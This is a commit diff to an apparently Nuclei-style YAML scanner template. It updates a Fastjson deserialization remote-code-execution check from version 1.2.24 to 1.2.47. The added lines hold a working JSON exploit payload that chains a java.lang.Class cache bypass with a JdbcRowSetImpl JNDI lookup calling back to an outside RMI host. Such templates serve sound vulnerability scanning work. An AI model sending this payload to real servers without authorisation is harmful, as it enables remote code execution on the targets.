Added Fastjson 1.2.47 Deserialization RCE

--- a/vulnerabilities/fastjson/fastjson-1247-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1247-rce.yaml
@@ -1,13 +1,13 @@
-id: fastjson-1.2.24-rce
+id: fastjson-1.2.47-rce
 
 info:
-  name: Fastjson 1.2.24 Deserialization RCE
+  name: Fastjson 1.2.47 Deserialization RCE
   author: zh
   severity: critical
   reference:
-    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
+    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
     - https://www.freebuf.com/vuls/208339.html
-    - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
+    - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
   tags: fastjson,rce,deserialization
 
 requests:
@@ -18,6 +18,10 @@ requests:
         Content-Type: application/json
 
         {
+            "a":{
+                "@type":"java.lang.Class",
+                "val":"com.sun.rowset.JdbcRowSetImpl"
+            },
             "b":{
                 "@type":"com.sun.rowset.JdbcRowSetImpl",
                 "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
@@ -35,5 +39,5 @@ requests:
       - type: word
         condition: and
         words:
-          - "Internal Server Error"
-          - "500"
+          - "Bad Request"
+          - "400"
